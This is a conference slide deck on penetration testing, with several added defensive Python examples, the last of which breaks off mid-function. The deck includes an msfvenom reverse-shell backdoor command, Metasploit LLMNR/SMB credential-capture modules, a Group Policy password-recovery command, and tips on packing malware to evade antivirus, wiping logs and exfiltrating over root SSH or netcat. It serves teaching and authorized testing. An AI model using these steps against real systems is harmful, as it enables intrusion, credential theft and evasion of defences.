#CLUS Penetration Testing For Network Engineers: Know Yourself and Enemy, Need Not Fear 100 Battles

Joseph Muniz – Architect Americas BRKSEC-2460

Cisco Webex Teams

Questions? Use Cisco Webex Teams (formerly Cisco Spark) to chat with the speaker after the session.

How:
1. Find this session in the Cisco Events App
2. Click “Join the Discussion”
3. Install Webex Teams or go directly to the team space
4. Enter messages/questions in the team space

Webex Teams will be moderated by the speaker until June 18, 2018. cs.co/ciscolivebot#BRKSEC-2460

#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public

Why Do We Fail?

Behind the Headlines

More than Computers and Phones

15B devices today, 50B in 2020, 500B in 2030


IoT Challenges

• Patch Delays
• Limited Security Development
• Rogue Devices

Threats Continue

• SamSam
• Nyetya

And Many Get It Wrong


Option 1: Hope Others Fix It

Option 2: Validate What’s Going On

Agenda

• Security Language Defined
• Penetration Testing Lab
• Testing Concepts
• Attacking Websites
• Attacking Networks
• Attacking People
• Attacking Mobile Devices
• Attacking IoT
• Reporting and Next Steps
• Conclusion

Yeay For Giveaways!

Download The CTR Comic

https://www.dropbox.com/s/43qfd9f7p8mk8fm/CTR20- Comic.pdf?dl=0

Joseph Muniz, Technical Security Architect

Security Architect – Americas Sales Organization

Security Researcher – www.thesecurityblogger.com

Speaker: Cisco Live / DEFCON / RSA / (ISC)2

Avid Futbal (Soccer for USA people) Player and Musician

Twitter @SecureBlogger

Risk Management

Cyberattacks Broken Down

• Common Language for Security Professionals
• Exploit takes advantage of vulnerability.
• Exploits are not malware, malware is malicious software.
• Vulnerabilities can be exploited.
• A dropper or stage 1 payload comes down to the victim.
• A RAT is a Remote Access Toolkit/Trojan.

Attack flow: Exploit → (takes advantage of) Vulnerability → (to deliver) Dropper / Payload → (downloading) RATs / Rootkit → (objective) Malware Goal


Not a Penetration Test

• Risk Management – Dealing with any type of risk
• Vulnerability Management – Dealing with vulnerabilities
• Incident Response – Responding to attacks
• Audit – Checking for compliance
• Digital Forensics – Investigating breaches / legal needs
• Hacking – Unlocking features / creating new capabilities

Audit – Specific thing like compliance

Assessment – Automated tools looking for vulnerabilities

Pentest – Testing vulnerabilities using real exploitation

Compliance

• Legal or Business
• Should be minimal security
• SOC enforces and reports
• Customized dashboards can help!

Aim for going beyond compliance.

Why First Perform a Vulnerability Assessment Before Pentest?

Assessment vs Penetration Test

• Assessment – Using automated systems to identify potential vulnerabilities
• Penetration Test – Executing attacks against identified vulnerabilities

Assessment is good to see your weaknesses. Penetration testing is good if you know you are secure.

Common Vulnerabilities and Exposures (CVE)

Vulnerability Type: Apache vulnerability
Threat Description: Three vulnerabilities in the Apache Struts 2 package
Existing Controls: Firewalled and monitored by IPS
Probability: Unlikely (not web facing)
Impact: Critical

http://cve.mitre.org/about/faqs.html

Vulnerability Assessment Results

Challenges

• May not be real
• Hard to execute
• Not accessible
• Critical or not?
• Specific requirements

How to Prioritize Risk - COBIT

Vulnerability Management Current State

Security is a Journey, Not a Destination

SANS - Vulnerability Management

• NAC and Profiling can help with Asset Inventory

• Triggers
  • CVE Identifier may trigger event
  • Assessment tools
  • Audits

Risk Management Best Practice Summary

• Automate Network Access
• Continuously Assess for vulnerabilities
• Develop Risk Rating Strategy
• Automate Enforcement (if possible)
• Enforce Posture Upon Connection
• Enforce Patch Management
• Subscribe and Follow Researchers
• Don’t Trust Everything You Hear

Penetration Testing

Penetration Testing Starting Points

White Box: Know target details; Topology given; Informed parties; Limited attacks. Very specific work.
Grey Box: Some details; Some topology; Limited awareness; Many attacks. Hybrid work.
Black Box: No details; Unknown topology; No awareness; Any attack. Attack any way possible.

Penetration Testing Services

• Internal teams typically perform White Box
• Grey Box is typically the best value
• Black Box can give interesting results and is the most realistic
• Reconnaissance is typically the most costly service

Work must be properly authorized!

Statement of Work

• Define target systems
• Timeframe
• Evaluation methods
• Tools and Software
• Notified parties
• Initial access level
• Authorization
• Risks / Critical Operation Areas
• Target space
• Define flag
• Deliverable
• Expected remediation
• Assumptions

Risks

• Legal rights to perform the test
• Systems could be harmed
• Alarms could be triggered
• Problems will likely be found; now you know and must deal with them
• Boundaries need to be established

Get out of Jail Card

• Authorization in writing
• Signed by the right person
• State risks
• Assign liability to stakeholder

Make sure to have this!

Building A Lab

Kali Linux

Open Source Penetration Testing Arsenal. Many Great Forensics Tools.

Download: www.kali.org

Make sure to update: apt-get update && apt-get upgrade

Metasploit

Penetration testing tool used for executing exploit code against a remote target machine.

Hundreds of exploits available.

Search the vulnerability and use MSF to deliver a packaged attack against the weakness.

Gain shell access, disrupt target, etc.

Struts Vulnerability Found


Defense Tools are Similar

Search struts in Firepower. Why can this be bad?

Lots of signatures for struts attacks come up.

Note: Ethical security vendors don’t always tell.

Sandbox - Cuckoo

https://www.cuckoosandbox.org/

TrIDNET or PEiD

VMware

Vulnerability Scanners

Credentialed and non-credentialed scanning is key.

Simple Lab Example

• Mac OS X host running VMware Fusion
• Kali Linux and Windows 7 virtual machines
• Kali USB
• Internet option
• 200 GB mobile storage

The Process

Attack Kill Chain: Weaponize → Deliver → Exploit → Install → Command & Control → Action

Vectors of an Attack

Physical: Intel Gather, Surveil, Pick, Force, Conceal, Persist
Digital: Scan, Assess, Exploit, Persist, Propagate, Exfiltrate
Social: Targeted Phishing, Conning Guards/Staff, Impersonation, Phone Phishing, Create Spies

Converged Attack: converged attacks are the most effective and most difficult to thwart.

Physical Attacks

• Keyboard Drivers
• System Backdoor
• Network Backdoor

Bashbunny, PacketSquirrel + Rubber Ducky

https://hakshop.com

USB Script Options

• Poison Tap or Responder – Grab from locked Windows systems
• Reverse SSH – Encrypted tunnel off network
• Root Scripts – Gain shell
• Many many more …. https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payloads

Lock Picking

Door Cards – Proxmark3

Digital Attacks

NMAP shows open ports! Nexpose shows vulnerabilities. Metasploit delivers the attack.

Social Attacks

Reconnaissance

• Learn everything about target
• 1st step in an attack and most time consuming
• More you know = better attack
• Find quickest and most effective approach

Reconnaissance Tools

• MASSCAN / NMAP – Scanners
• (RIR) / EDGAR – Registered public info
• Profiling – Best guess about endpoint (ex NMAP -A)
• Public Data – Wayback Machine, Maltego, Shodan.io
• Burp – Communication monitoring
• Scanner – Vulnerability searching
• Google Maps / Images / etc – Physical layout and social

Weaponization

• Build Rootkit
• Package With Application
• Encode until unrecognizable

Exploitation

Metasploit – Framework for developing and executing exploit code against a remote target machine

Establishing Foothold

• Obtain access to multiple systems
• If one foothold is removed, others are available
• Accomplished through exploitation and lateral movement, also known as pivoting

Command and Control

• Keyboard access to network
• Through compromised hosts, systems, etc.
• Best to NOT show two-way display
• Sometimes bot network
• Blends in with common traffic

Hard to detect!

Data Exfiltration

• Data removed from network
• Potentially encrypted (reverse SSH)
• Could break up the data
• Send it with sporadic timing

Attacking Websites

Let the attacking begin

Web Recon - Shodan.io

92% of Internet devices surveyed were running known vulnerabilities, an average of 26 each.

Web Reconnaissance

• Whois – Example [email protected]
• Google Hacking – intext: classified | “this file generated by Nessus” | intitle:index.of inbox dbx
• Wayback Machine – Find old versions of website
• Robots.txt – Paths they want hidden from spiders
• Banners – Free info about the system
• DIG – DNS info


EDGAR and RIR

• ICANN – https://www.icann.org/
• EDGAR – Public company records
• Regional Internet Registries (RIR)
  • USA – www.arin.net/index.html
  • Asia Pacific – http://apnic.net/
  • Europe – http://www.ripe.net
  • Latin America – http://www.lacnic.net
  • Africa – https://www.afrinic.net/en/about/service-region

Interrogate DNS

• Domain Information Groper (DIG)
• MxToolbox – web tool

Interrogate DNS (Inside)

Find the DNS suffix in use on the domain:
• cat /etc/resolv.conf

Find the list of Domain Controllers:
• nslookup
• set q=SRV
• _ldap._tcp.dc._msdcs.

Target Fingerprinting

• ICMP Port unreachable messages
• Banners
• Binaries
• Port Signatures
• Non-standard handshakes
• Response to SYN floods
• Packets with non-standard TCP/IP flags

Tools like NMAP can do this for you.

Network Mapper

• NMAP
  • -sP = Network Discovery
  • -sT = Host Discovery
  • -sV = Service Interrogation
  • -sU = UDP scanning
  • -sA = Map out firewall rulesets (stateful? Filtered ports?)
  • -sF = Discover closed ports

• Hping3 - Command-line oriented TCP/IP packet assembler/analyzer

Stealth / Legal

• Completing the handshake could be illegal!
• -sT = illegal | -sS = not illegal (not legal advice!)

• SYN Scan – Half-open scan for stealth
• Add delay (example “--scan-delay 90000”)
• Sending ICMP traffic with different types
• Response doesn’t matter. Looking for hosts!

Save active devices to file:
cat alive-scan.txt | grep "report for" | awk '{print $5}' | tee alive-IPs.txt
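The awk pipeline above prints field 5, which is the hostname rather than the IP whenever nmap could reverse-resolve a host (that line reads "Nmap scan report for name (ip)"), and it also keeps "[host down]" lines from verbose scans. This is an added example, not from the deck, that extracts the IP from both line forms; the nmap output it parses is constructed, and awk_field_five is included only to show what the pipeline actually yields.

```python
import re

# Constructed nmap output standing in for alive-scan.txt; not a real scan.
# 10.0.0.23 and 10.0.0.51 reverse-resolved, so their lines carry "name (ip)".
SAMPLE_NMAP_OUTPUT = """\
Starting Nmap 7.70 ( https://nmap.org )
Nmap scan report for 10.0.0.5
Host is up (0.0010s latency).
Nmap scan report for printer.corp.example (10.0.0.23)
Host is up (0.0020s latency).
Nmap scan report for 10.0.0.40 [host down]
Nmap scan report for fileserver.corp.example (10.0.0.51)
Host is up (0.0030s latency).
Nmap done: 256 IP addresses (3 hosts up) scanned in 2.10 seconds
"""

# Matches both "Nmap scan report for 10.0.0.5" and
# "Nmap scan report for name (10.0.0.23)"; -v output appends " [host down]".
REPORT_RE = re.compile(
    r"^Nmap scan report for "
    r"(?:(?P<host>\S+) \((?P<ip_paren>[0-9.]+)\)|(?P<ip>[0-9.]+))"
    r"(?P<down> \[host down\])?$"
)


def alive_hosts(nmap_text):
    """Return [(ip, hostname_or_None)] for each host nmap reported, skipping down hosts."""
    hosts = []
    for line in nmap_text.splitlines():
        m = REPORT_RE.match(line.strip())
        if not m or m.group("down"):
            continue
        hosts.append((m.group("ip") or m.group("ip_paren"), m.group("host")))
    return hosts


def alive_ips(nmap_text):
    """The IP list the awk pipeline was meant to produce."""
    return [ip for ip, _ in alive_hosts(nmap_text)]


def awk_field_five(nmap_text):
    """What `grep "report for" | awk '{print $5}'` actually yields: hostnames leak in."""
    return [line.split()[4] for line in nmap_text.splitlines() if "report for" in line]


if __name__ == "__main__":
    print("\n".join(alive_ips(SAMPLE_NMAP_OUTPUT)))
```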

Open Ports … Now What?

• Determine services/daemons that are running to find exploits! (ex nmap -sV)
• Port numbers – www.iana.org/assignments/port-numbers
• Ports can run any service! You should interrogate by connecting to it.
• Example: telnet to port 25

Also gather other data like banners.

OWASP Top 10

• Easy to get to, poor security and most vulnerable!
• OWASP – Great resource for news and standards

• Cross Site Scripting (XSS)
• Injection Flaws
• Malicious File Execution
• Insecure Direct Object Reference
• Cross Site Request Forgery
• Information Leakage and Improper Error Handling
• Broken Authentication and Session Management
• Insecure Cryptographic Storage
• Insecure Communications
• Failure to Restrict URL Access

Summarizing Web Testing

(Figure: three steps, One / Two / Three)

Attacking Networks

Plugging in Networks

• No security = Instant access
• Port security = Possible static MAC list
• NAC = Need to beat assessment profile
• NAC is port driven, try weird ports

Spoofing trusted devices may work

Hacking SNMP

• Default Community – public / private
• Spoof address of manager or devices
• Typically won’t notice “quiet” devices
• Brute force SNMP authentication
• Typically not monitored
• SNMP walking – Try strings across multiple systems
• SNMP brute force – Run a .txt file of strings
• SNMP attacking – Abuse when rw is enabled

Attacking SNMP

Onesixtyone – Brute force with text file

Snmpwalk – Test various community strings

Public exists, private doesn’t

Change SNMP if RW is enabled! Find it by grep v1
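The defender's side of the two SNMP slides, as an added example that is not from the deck: audit IOS-style snmp-server community lines for the default strings, RW access and a missing access-list, which is exactly what an onesixtyone or snmpwalk sweep finds first. The configuration excerpt is constructed, and the severity labels and the minimum length are this example's own assumptions.

```python
import re

# Constructed IOS-style configuration excerpt, not from a real device.
SAMPLE_CONFIG = """\
hostname core-sw1
snmp-server community public RO
snmp-server community private RW
snmp-server community Xk7!mon-Q2 RO 10
snmp-server community netops RW
snmp-server group V3ADMIN v3 priv
access-list 10 permit 10.1.1.5
"""

# The two strings the slide names as defaults; extend with your vendor's own.
DEFAULT_COMMUNITIES = {"public", "private"}

# snmp-server community <string> [view <name>] [RO|RW] [<acl>]   (IOS syntax; RO when omitted)
COMMUNITY_RE = re.compile(
    r"^snmp-server community (?P<name>\S+)"
    r"(?: view (?P<view>\S+))?"
    r"(?: (?P<mode>RO|RW))?"
    r"(?: (?P<acl>\S+))?$",
    re.IGNORECASE,
)


def parse_communities(config_text):
    """Return [(community, mode, acl_or_None)] for every v1/v2c community in the config."""
    found = []
    for line in config_text.splitlines():
        m = COMMUNITY_RE.match(line.strip())
        if m:
            found.append((m.group("name"), (m.group("mode") or "RO").upper(), m.group("acl")))
    return found


def audit_snmp_communities(config_text, min_length=8):
    """Findings as (community, severity, reason). Severity labels are assumptions of this example."""
    findings = []
    for name, mode, acl in parse_communities(config_text):
        if mode == "RW":
            findings.append((name, "critical",
                             "read-write community: anyone holding the string can rewrite the config"))
        if name.lower() in DEFAULT_COMMUNITIES:
            findings.append((name, "high",
                             "default community string; first guess in any brute-force wordlist"))
        elif len(name) < min_length:
            findings.append((name, "medium", f"community shorter than {min_length} characters"))
        if acl is None:
            findings.append((name, "medium",
                             "no access-list: a spoofed manager address is accepted from anywhere"))
    return findings


def worst_severity(findings):
    """Highest severity present, or None when the config is clean."""
    order = {"critical": 3, "high": 2, "medium": 1}
    return max((f[1] for f in findings), key=order.get, default=None)


if __name__ == "__main__":
    for community, severity, reason in audit_snmp_communities(SAMPLE_CONFIG):
        print(f"[{severity}] {community}: {reason}")
```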

Viewing Network Data

• Inline – direct real-time live traffic
• SPAN port – copy of traffic

PCAP = Historical. Live should have filtering (example: TCPDump filter on POST).

Display filters (Wireshark syntax):
tcp.flags.syn && tcp.flags.ack==0
tcp.flags.syn==1 && tcp.flags.ack==1
tcp.flags.reset && tcp.flags.ack
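An added example, not from the deck, that applies the three flag predicates above to a list of packet records and flags sources that send many SYNs but complete almost no handshakes, the traffic pattern of the half-open (-sS) scan from the Stealth / Legal slide. The packet records are constructed (the kind of thing a SPAN port or PCAP would yield) and the thresholds are assumptions.

```python
from collections import defaultdict

# TCP flag bits, the same fields the display filters above test
# (tcp.flags.syn, tcp.flags.ack, tcp.flags.reset).
FIN, SYN, RST, PSH, ACK = 0x01, 0x02, 0x04, 0x08, 0x10


def is_syn(flags):
    """tcp.flags.syn && tcp.flags.ack==0 : first leg of a handshake, or a scan probe."""
    return bool(flags & SYN) and not flags & ACK


def is_syn_ack(flags):
    """tcp.flags.syn==1 && tcp.flags.ack==1 : second leg, the port is open."""
    return bool(flags & SYN) and bool(flags & ACK)


def is_rst_ack(flags):
    """tcp.flags.reset && tcp.flags.ack : refusal, the port is closed."""
    return bool(flags & RST) and bool(flags & ACK)


def _build_sample_packets():
    """Constructed packet records (src, sport, dst, dport, flags), not a real capture.
    10.0.0.99 probes 12 ports on 10.0.0.5 and tears every open one down with a bare RST
    instead of finishing the handshake, which is what a half-open (-sS) scan looks like.
    10.0.0.7 is a normal client that completes one handshake to port 443."""
    pkts = []
    for i, dport in enumerate([21, 22, 23, 25, 53, 80, 110, 135, 139, 143, 443, 445]):
        sport = 40000 + i
        pkts.append(("10.0.0.99", sport, "10.0.0.5", dport, SYN))
        if dport in (22, 80, 443):            # open ports answer SYN/ACK
            pkts.append(("10.0.0.5", dport, "10.0.0.99", sport, SYN | ACK))
            pkts.append(("10.0.0.99", sport, "10.0.0.5", dport, RST))
        else:                                  # closed ports answer RST/ACK
            pkts.append(("10.0.0.5", dport, "10.0.0.99", sport, RST | ACK))
    pkts += [
        ("10.0.0.7", 51000, "10.0.0.5", 443, SYN),
        ("10.0.0.5", 443, "10.0.0.7", 51000, SYN | ACK),
        ("10.0.0.7", 51000, "10.0.0.5", 443, ACK),        # third leg: handshake done
        ("10.0.0.7", 51000, "10.0.0.5", 443, PSH | ACK),  # application data
    ]
    return pkts


SAMPLE_PACKETS = _build_sample_packets()


def summarize_sources(packets):
    """Per source IP: SYNs sent, SYN/ACKs and RST/ACKs received in reply, handshakes completed."""
    stats = defaultdict(lambda: {"syn": 0, "syn_ack_recv": 0, "rst_ack_recv": 0, "completed": 0})
    probes = set()       # 4-tuples for which we saw the client's SYN
    completed = set()    # 4-tuples for which the client later sent a bare ACK
    for src, sport, dst, dport, flags in packets:
        if is_syn(flags):
            stats[src]["syn"] += 1
            probes.add((src, sport, dst, dport))
        elif is_syn_ack(flags) or is_rst_ack(flags):
            # reply direction: the original client is dst; only count replies to a SYN we saw
            if (dst, dport, src, sport) in probes:
                key = "syn_ack_recv" if is_syn_ack(flags) else "rst_ack_recv"
                stats[dst][key] += 1
        elif flags & ACK and not flags & (SYN | RST | FIN):
            key = (src, sport, dst, dport)
            if key in probes and key not in completed:
                completed.add(key)
                stats[src]["completed"] += 1
    return dict(stats)


def suspected_scanners(packets, min_syns=10, max_completion=0.2):
    """Sources with at least min_syns probes and a completion ratio at or below max_completion.
    Thresholds are assumptions; tune them to the monitored segment."""
    flagged = {}
    for src, s in summarize_sources(packets).items():
        if s["syn"] >= min_syns and s["syn"] and s["completed"] / s["syn"] <= max_completion:
            flagged[src] = s
    return flagged


if __name__ == "__main__":
    for src, s in suspected_scanners(SAMPLE_PACKETS).items():
        print(f"{src}: {s['syn']} SYNs, {s['syn_ack_recv']} open, "
              f"{s['rst_ack_recv']} closed, {s['completed']} completed handshakes")
```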


WiFi MiTM

Karma – Ability to clone SSIDs and man-in-the-middle the mobile device

SSL-Strip – Removing the HTTPS request so authentication is in the clear.

Defending

• VPN
• Disable Auto WiFi Connect
• WIDS/WIPS
• Remove HTTP from critical servers

How Easy is Getting Wireless MiTM?

WiFi Pineapple
• Wireless pentesting tool
• Can spoof SSID and perform SSL-Strip
• Cost: $100 - $200 from Hak5

Raspberry Pi
• $35 computer
• Can host any OS including Kali Linux
• Kali Linux offers multiple penetration testing applications


Network MiTM

• Get network traffic through your device
• ARP poison
• Inline
• Proxy (network or host)

PacketSquirrel | Ettercap = Easy Testing

Targeting User Accounts

• Abuse Link-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NetBIOS-NS)
• Both resolve hostnames to IP addresses
• Trick the victim into connecting to Kali Linux instead, capturing credentials

auxiliary/spoof/llmnr/llmnr_response
auxiliary/spoof/nbns/nbns_response
auxiliary/server/capture/smb

Windows - ShareCheck

• Use of non-standard local admin accounts
• Windows file sharing vulnerabilities
• Global groups granted local admin access
• Insecure account lockout

http://www.sec-1.com/blog/2014/sharecheck

Attack Logging and Time

• Injecting False Information
• Wiping logs
• Adjusting Timestamps
• Word Wrapping – Using white space padding
• HTML or Terminal attack

Exfiltration

• Allow root remote – /etc/ssh/sshd_config, comment out “PermitRootLogin no”
• Netcat
• Create account on existing FTP / SSH
• Lightweight FTP – BabyFTP | Vsftpd | Mollensoft FTP

Avoid Trojans and Keyloggers – Painful Cleanup!

Attacking People

You can be anybody

Emily Williams

• Total Connections: 170 Employees, 71 Cisco; 22 NetApp; 10 EMC; 35 McAfee; 300+ Facebook friends
• Endorsements: 22 LinkedIn Endorsements, for expertise and experience, from partners and co-workers
• Offers: 4 job offers, laptop and office equipment, network access.

Speak Like Your Target

• Use Facebook and LinkedIn as a weapon
• What do you leave on social networks that could be used against you?
• Hide attacks in Social Media messages
• Read their E-mail / Posts / Etc and learn their language


Phishing / Spear Phishing

• Best to customize based on Recon
• Tie it to holidays / events
• Language is everything!
• Goal can be info or cause action

Practice this skill

Phishing Emails

Cisco Phishing Stats

Browser Injection Framework (BeEF)

• Hook victim browsers as beachheads for attacks
• Social engineer to click customized link
• Available attacks depend on current browser vulnerabilities
• Can track hooked systems

Social Engineering Tool Kit (SET)

• Easily clone a website
• Create various phishing attacks
• Create payload and listener
• Mailer attacks
• PowerShell attacks
• And many many more ….

Business Email Compromise

Attacker ([email protected]): We have conference dues to pay that are late. Pay at www.hackme.com/dues

Cisco Financial ([email protected]): Ok I’m on it!

Attacking Exploits

Packing Malware 101

Bypass signature-based detection

Executable = (un)packer (changed frequently) + payload (unpacked malware, changed less frequently)

Encoding 1 – Create Backdoor

Metasploit: msfvenom -p python/meterpreter/reverse_tcp LHOST=ANYIP LPORT=ANYPORT -f raw > anyname.py

Encoding 2 – Decrypt and Add Crap

• Open with text editor
• Decode with online source https://www.base64decode.org/

Copy source code, paste and modify

Privilege Escalation

• cpassword – Group Policy passwords are encrypted but reversible
• GP3finder simplifies this: gp3finder.py -A -t DOMAIN_CONTROLLER -u DOMAINUSER
• Mimikatz – Meterpreter extraction
• Incognito – Enumerate and impersonate tokens

Why is Empire / PowerShell very effective at bypassing host security (Windows)?

Empire

• Exploit framework targeting Windows
• Listener – Waits for connection
• Stager – Code placed on compromised system
• Agent – Maintains connection between you and victim
• Runs commands in memory.
• Antivirus hates this!

Concepts

• BIOS – Try manufacturer password
• Guessing or recovering a password (admin | password | cisco | blank | vendor name)
• Dictionary / Rainbow Tables
• Man-in-the-middle
• Attacking encryption

Lots of Password Cracking Tools

• Brutus - Remote online cracking tool
• RainbowCrack - Hash cracker tool, Windows/Linux based
• Wfuzz - Web application brute forcing (GET / POST), (SQL, XSS, LDAP, etc)
• Cain and Abel - Few features of password cracking ability
• - Offline mode, auto hash password type detector
• THC Hydra - tool for many databases, over 30 protocols
• AirCrack-NG - WEP and WPA-PSK keys cracking
• / Medusa / L0phtCrack / Etc. ……

CeWL

Passwords

• Windows Password Storage – SAM
• SYSKEY – Additional SAM encryption
• Linux Password Storage – passwd / shadow
• Attacking Active Directory
• Local Security Authority (LSA) cached accounts
• Microsoft hashing types

Attacking Mobile Devices

Always Research

• Mobile exploitation constantly changing
• New vulnerabilities constantly discovered
• Vendors are improving patching
• Attack tools constantly improving

Attacks are not black and white – TEST!

Phones: MAC OSX

• Jailbreaking usually older iOS
• Attack iTunes backups
• AnyTrans or iPhone Backup Extractor
• iOS Snapshots

#CLUS BRKSEC-2460 © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 142 Phones: Android

• Older versions – connect as mass storage
• Version 6 or later – encrypted
• Root device – KingoRoot
• SMS database: /data/data/com.android.providers.telephony/databases/mmssms.db
• Script to read SMS:
    SELECT datetime(date/1000, 'unixepoch', 'localtime'),
           datetime(date_sent/1000, 'unixepoch', 'localtime'),
           person, body
    FROM sms
    WHERE thread_id = 310
    ORDER BY date

143 Example Reading SMS

| date                | date_sent           | person | body                                                         |
|---------------------|---------------------|--------|--------------------------------------------------------------|
| 2017-10-20 13:48:18 | 2017-10-20 13:48:16 | 54     | Hello Randy! Where should I send my Cisco live presentation? |
| 2017-10-20 16:34:03 | 2017-01-01 02:00:00 |        | Damn, thanks ! for texting jet                               |
| 2017-10-20 16:40:02 | 2017-10-20 16:40:01 | 54     | Jet? When you are a Jet, you’re a jet? West Side??           |
|                     |                     |        | Stupid auto correct!                                         |
|                     |                     |        | I’m going to dropkick you Joey ... And this phone            |
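
The query on the Android slide and the output above come from the deck; what follows is an added example, not the deck's own script, that runs the same statement with Python's built-in sqlite3 module against a constructed in-memory copy of the telephony `sms` table so it can be exercised offline. Two changes from the slide's one-liner are deliberate: `thread_id` is bound as a parameter instead of being pasted into the SQL, and the `'localtime'` modifier is optional so results are reproducible on an analysis workstation in any time zone. On a real extraction you would open the `mmssms.db` path from the slide instead of `build_sample_db()`.

```python
"""Read SMS rows from an Android mmssms.db-style SQLite database.

Added example for this section (not code from the BRKSEC-2460 deck). It runs the
deck's query against a constructed in-memory stand-in for the telephony 'sms'
table; on a real extraction open
/data/data/com.android.providers.telephony/databases/mmssms.db instead.
"""
import sqlite3
from datetime import datetime, timezone
from typing import List, Tuple


def _ms(year, month, day, hour, minute, second) -> int:
    """Epoch milliseconds, which is how Android stores 'date' and 'date_sent'."""
    return int(datetime(year, month, day, hour, minute, second,
                        tzinfo=timezone.utc).timestamp() * 1000)


def build_sample_db() -> sqlite3.Connection:
    """Constructed stand-in for mmssms.db with only the columns the query needs."""
    conn = sqlite3.connect(":memory:")
    conn.execute("""CREATE TABLE sms (
        _id INTEGER PRIMARY KEY, thread_id INTEGER, date INTEGER,
        date_sent INTEGER, person INTEGER, body TEXT)""")
    rows = [  # constructed messages; person is NULL when the sender is not a contact
        (310, _ms(2017, 10, 20, 13, 48, 18), _ms(2017, 10, 20, 13, 48, 16), 54, "Where should I send the slides?"),
        (310, _ms(2017, 10, 20, 16, 34, 3), 0, None, "Sent, thanks!"),
        (5, _ms(2017, 10, 21, 9, 0, 0), _ms(2017, 10, 21, 8, 59, 58), 12, "Unrelated thread"),
    ]
    conn.executemany(
        "INSERT INTO sms (thread_id, date, date_sent, person, body) VALUES (?, ?, ?, ?, ?)", rows)
    return conn


def read_thread(conn: sqlite3.Connection, thread_id: int, local_time: bool = False) -> List[Tuple]:
    """Return (date, date_sent, person, body) for one conversation, oldest first.

    thread_id is bound as a parameter rather than pasted into the SQL, and the
    only variable part of the statement is a fixed modifier chosen by a boolean,
    so untrusted input never reaches the query text.
    """
    tz = ", 'localtime'" if local_time else ""
    sql = (
        f"SELECT datetime(date/1000, 'unixepoch'{tz}), "
        f"datetime(date_sent/1000, 'unixepoch'{tz}), person, body "
        "FROM sms WHERE thread_id = ? ORDER BY date"
    )
    return conn.execute(sql, (thread_id,)).fetchall()


if __name__ == "__main__":
    db = build_sample_db()
    for row in read_thread(db, 310):
        print(" | ".join("" if v is None else str(v) for v in row))
```

A `date_sent` of 0 shows up as the Unix epoch, which is what the odd second column in the slide's output hints at: the field is only populated for messages the carrier stamped, so treat it as secondary evidence next to `date`.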

144 Brute Force PINs

• Most phones lock if brute forced
• TIP: Plugging in a keyboard can bypass this.
• TIP 2: Rubber Ducky abuses keyboard drivers and is an effective brute-force tool

145 Many Commercial Tools Available

• Cellebrite or Elcomsoft are good but pricey!
• Know that even professional tools have limitations!

146 Accessing Unauthorized Voicemail

147 Testing IoT

Hacking IoT: Lightbulbs, Conference Blinky Things, Power plugs, Cameras (figure labels)

149 Hacking IoT
• Micro drive or plug to access hardware
• Firmware security analysis and modification
• Radio- / wireless-based exploitation
• Application exploitation
• Hardware exploitation (example JTAG)

150 IoT Recon

• Mobile application downloads
• Web dashboards and resources
• Firmware or source code
• Any available APIs
• Plugs to access hard drive / removable storage

151 IoT Firmware

Firmware – Code running on the hardware (bootloader, file systems, kernel, etc.)

Many devices don’t validate firmware!

Call support for help!

152 IoT Hardware Hacking

• Common to get unauthenticated root when tapping into the hardware
• Identify UART or JTAG pins
• Use a multimeter to find ground, transmit and receive
• Connect to an exploitation tool (ATTIFY Badge), adjust the baud rate until you can read. It's likely to be unauthenticated.

153 Radio Interfaces

• Software Defined Radio
• ZigBee exploitation
• Bluetooth

Example Attack Methods

• Man-in-the-middle attack
• Insecure CRC verification
• Replay attack
• Clear text
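
Three of the four attack methods listed above share one root cause: the radio frame carries no secret. A CRC only detects accidental corruption, so anyone can change a field and recompute it; a clear-text frame with a valid CRC can be replayed indefinitely. The block below is an added example (not from the deck) that shows, on constructed frames, a CRC-32 check accepting a modified frame, a keyed HMAC-SHA256 tag rejecting the same modification, and a receive-side counter refusing a replayed frame. The frame layout (4-byte counter, payload, tag) and the device key are assumptions for illustration.

```python
"""Why a CRC is not a security check, and how a keyed tag plus a counter stops replay.

Added example for this section (not code from the BRKSEC-2460 deck). Frames are
constructed here: 4-byte big-endian counter, payload, then either a CRC-32 or a
truncated HMAC-SHA256 tag. The key is a placeholder, not a real device key.
"""
import hashlib
import hmac
import struct
import zlib
from typing import Dict, Tuple

TAG_LEN = 16  # 128-bit truncated HMAC tag


def crc_frame(counter: int, payload: bytes) -> bytes:
    """Frame protected only by CRC-32 (integrity against noise, not against a sender)."""
    body = struct.pack(">I", counter) + payload
    return body + struct.pack(">I", zlib.crc32(body) & 0xFFFFFFFF)


def crc_ok(frame: bytes) -> bool:
    body, tag = frame[:-4], frame[-4:]
    return struct.pack(">I", zlib.crc32(body) & 0xFFFFFFFF) == tag


def mac_frame(key: bytes, counter: int, payload: bytes) -> bytes:
    """Frame protected by a keyed tag: producing a valid tag requires the key."""
    body = struct.pack(">I", counter) + payload
    return body + hmac.new(key, body, hashlib.sha256).digest()[:TAG_LEN]


def mac_ok(key: bytes, frame: bytes) -> bool:
    body, tag = frame[:-TAG_LEN], frame[-TAG_LEN:]
    expected = hmac.new(key, body, hashlib.sha256).digest()[:TAG_LEN]
    return hmac.compare_digest(expected, tag)   # constant-time comparison


def alter_payload(frame: bytes, tag_len: int, new_payload: bytes, recompute_crc: bool) -> bytes:
    """Rebuild a frame with a different payload, keeping its counter.

    With a CRC the check value can simply be refreshed (no secret involved);
    with a keyed tag the old tag is kept because it cannot be regenerated.
    """
    body = frame[:4] + new_payload
    if recompute_crc:
        return body + struct.pack(">I", zlib.crc32(body) & 0xFFFFFFFF)
    return body + frame[-tag_len:]


class Receiver:
    """Accepts a frame only if the keyed tag verifies and the counter moves forward."""

    def __init__(self, key: bytes):
        self.key = key
        self.last_counter = -1

    def accept(self, frame: bytes) -> Tuple[bool, str]:
        if not mac_ok(self.key, frame):
            return False, "bad tag"
        counter = struct.unpack(">I", frame[:4])[0]
        if counter <= self.last_counter:        # seen before (or older): drop as replay
            return False, "replay"
        self.last_counter = counter
        return True, "ok"


def demo() -> Dict[str, object]:
    key = b"placeholder-device-key"   # constructed; real deployments provision per-device keys
    rx = Receiver(key)
    legit_crc = crc_frame(1, b"state=0")
    legit_mac = mac_frame(key, 1, b"state=0")
    results: Dict[str, object] = {}
    # CRC: a changed payload with a refreshed CRC passes the check every time.
    results["crc_accepts_modified"] = crc_ok(alter_payload(legit_crc, 4, b"state=1", True))
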